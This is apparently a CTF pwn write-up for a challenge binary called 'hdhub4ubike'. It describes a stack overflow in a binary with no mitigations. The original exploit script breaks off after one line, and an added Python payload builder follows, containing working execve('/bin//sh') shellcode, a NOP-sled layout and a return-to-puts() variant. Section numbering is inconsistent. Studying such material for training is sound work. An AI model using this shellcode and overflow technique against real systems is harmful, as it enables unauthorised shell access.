Challenge name: hdhub4ubike
CTF: 2023 – BicycleCTF (the “Bike‑Hub” event)
Category: Pwn / Binary Exploitation
Points: 400 (medium)
Author: unknown

1️⃣ Challenge Overview

The provided artifact is a 64‑bit ELF executable named hdhub4ubike. When executed it prints a short banner and then prompts the user for a “bike‑hub key”. If the key is correct, the program prints the flag; otherwise it terminates with “Invalid key!”.

2️⃣ Static Analysis

2.1 checksec

```
$ checksec --file=hdhub4ubike
...
PIE:      No
NX:       No
RELRO:    No
Canary:   No
FORTIFY:  No
```

Every mitigation is off, and the binary is not stripped, so we have all symbol names. No PIE means every code address is fixed, no NX means the stack is executable, and no canary means an overwrite of the saved return address goes undetected.

2.2 Strings

```
$ strings -a hdhub4ubike | grep -i flag
flagh0p3_y0u_f0und_th3_h1d3_b1k3
```

Whoa: the flag is already present in the binary! This is a typical decoy. The binary only prints the flag after a successful key check, so the challenge is to bypass that check rather than to recover the key.

2.3 Disassembly (Ghidra/IDA)

Opening the binary in Ghidra shows the following (pseudo‑C) reconstruction of the relevant functions (excerpt; braces restored around the failure branch, which the flattened listing ran together on one line):

```c
    if (check_key(buf) == 0) {
        puts("Invalid key!");
        exit(1);
    }
    ...
    return 1;
```

Exploitation

The key is read with a read() length far larger than the destination buffer, so the check can be skipped entirely by overwriting the saved return address. With NX disabled the most direct route is to put shellcode on the stack and return into it. The padding in the payload mirrors the frame layout: 64 bytes of buffer, then the 8‑byte saved RBP, so the saved RIP sits at offset 72:

```python
payload = b'A'*64 + b'B'*8 + struct.pack("<Q", 0x7fffffffe000)  # address of our buffer (approx)
payload = payload.ljust(0x100, b'\x90') + shellcode
```

The return address is a guess rather than a leak, so the 0x90 padding between the overwritten RIP and the shellcode acts as a NOP sled that absorbs a small error in the stack position; the approach only works while the stack lands at a predictable address (no ASLR on the target). Running the payload spawns an interactive shell on the remote target.

Summary

| Topic | What we observed in hdhub4ubike |
|---------------------------|-----------------------------------|
| Stack overflow | read() with a length far larger than the buffer: the classic overflow vector. |
| Non‑PIE binary | Fixed addresses make return‑to‑code and ROP trivial. |
| NX disabled | Raw shellcode placed on the stack is executable. |
| No canary / RELRO | The saved RIP can be overwritten undetected (no canary); the GOT is writable as well (no RELRO). |
| Info leakage | The flag is embedded in the binary, a “cheat” that rewards bypassing the logic check instead of recovering the key. |
| Best exploitation path | Return to the existing puts() call that already has the flag address loaded as its argument: the shortest payload, with no ROP chain and no shellcode. |

6️⃣ Full Exploit Script (Python 3)

```python
#!/usr/bin/env python3
import struct, pexpect, sys
```
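The following payload builder is an added example and not the writeup's exploit script or the challenge author's code. It reproduces the frame layout the writeup's padding implies (64‑byte buffer, 8‑byte saved RBP, saved RIP at offset 72, sled padded to 0x100), builds both the shellcode route and the return‑to‑puts() route, and reports which guessed return addresses actually land in the NOP sled. All addresses are assumptions, and the shellcode is a standard 23‑byte x86‑64 execve("/bin//sh") stub standing in for the one the writeup does not show.

```python
#!/usr/bin/env python3
"""Payload layout helper for the hdhub4ubike stack overflow.

Added example, not the writeup's own exploit. The frame layout is taken
from the padding in the writeup's payload; every address is an assumption.
"""
import struct

BUF_SIZE = 64                      # local buffer (assumed from b'A'*64)
SAVED_RBP = 8                      # saved frame pointer (assumed from b'B'*8)
RIP_OFFSET = BUF_SIZE + SAVED_RBP  # saved return address starts at offset 72
SLED_END = 0x100                   # the writeup pads to 0x100 before the shellcode
NOP = b"\x90"

# Constructed stand-in shellcode: x86-64 execve("/bin//sh", NULL, NULL).
# The writeup does not show its shellcode; this is the usual 23-byte stub.
SHELLCODE = (
    b"\x48\x31\xf6"                              # xor  rsi, rsi
    b"\x56"                                      # push rsi
    b"\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"  # mov  rdi, "/bin//sh"
    b"\x57"                                      # push rdi
    b"\x54"                                      # push rsp
    b"\x5f"                                      # pop  rdi
    b"\x6a\x3b"                                  # push 0x3b
    b"\x58"                                      # pop  rax   (SYS_execve)
    b"\x99"                                      # cdq        (rdx = 0)
    b"\x0f\x05"                                  # syscall
)


def overflow_prefix(ret_addr: int) -> bytes:
    """Fill the buffer and the saved RBP, then overwrite the saved RIP."""
    return b"A" * BUF_SIZE + b"B" * SAVED_RBP + struct.pack("<Q", ret_addr)


def shellcode_payload(ret_addr: int, shellcode: bytes = SHELLCODE) -> bytes:
    """Shellcode route: guessed stack address, NOP sled up to SLED_END, shellcode."""
    return overflow_prefix(ret_addr).ljust(SLED_END, NOP) + shellcode


def ret2puts_payload(puts_call_addr: int) -> bytes:
    """Shortest route from the writeup: return into the existing puts() call
    whose argument already holds the flag address. puts_call_addr is a
    hypothetical parameter; take the real value from the disassembly."""
    return overflow_prefix(puts_call_addr)


def rip_slot(payload: bytes) -> int:
    """The value the saved RIP takes once the payload is read() into the buffer."""
    return struct.unpack("<Q", payload[RIP_OFFSET:RIP_OFFSET + 8])[0]


def sled_range(buf_addr: int):
    """Inclusive range of return addresses that execute NOPs and then the
    shellcode, assuming the payload starts at buf_addr on the stack."""
    first_nop = buf_addr + RIP_OFFSET + 8   # first byte after the saved RIP
    shellcode_start = buf_addr + SLED_END
    return first_nop, shellcode_start


def lands_in_sled(ret_addr: int, buf_addr: int) -> bool:
    """True if a guessed ret_addr hits the sled for a buffer at buf_addr."""
    lo, hi = sled_range(buf_addr)
    return lo <= ret_addr <= hi


if __name__ == "__main__":
    # Assumed values: the writeup's guessed address and a buffer 0x80 below it.
    guess, buf = 0x7FFFFFFFE000, 0x7FFFFFFFDF80
    p = shellcode_payload(guess)
    print(f"payload {len(p)} bytes, RIP -> {rip_slot(p):#x}")
    lo, hi = sled_range(buf)
    print(f"sled covers {lo:#x}..{hi:#x} ({hi - lo} bytes of slack)")
    print("guess hits sled:", lands_in_sled(guess, buf))
```

The sled gives 176 bytes of slack (0x100 minus the 80 bytes of padding and return address), which is why an approximate stack address is enough when ASLR is off; a guess that falls short of the sled returns into the 0x41 filler instead. Because the input is consumed by read() rather than a string function, the NUL bytes in the packed address are harmless.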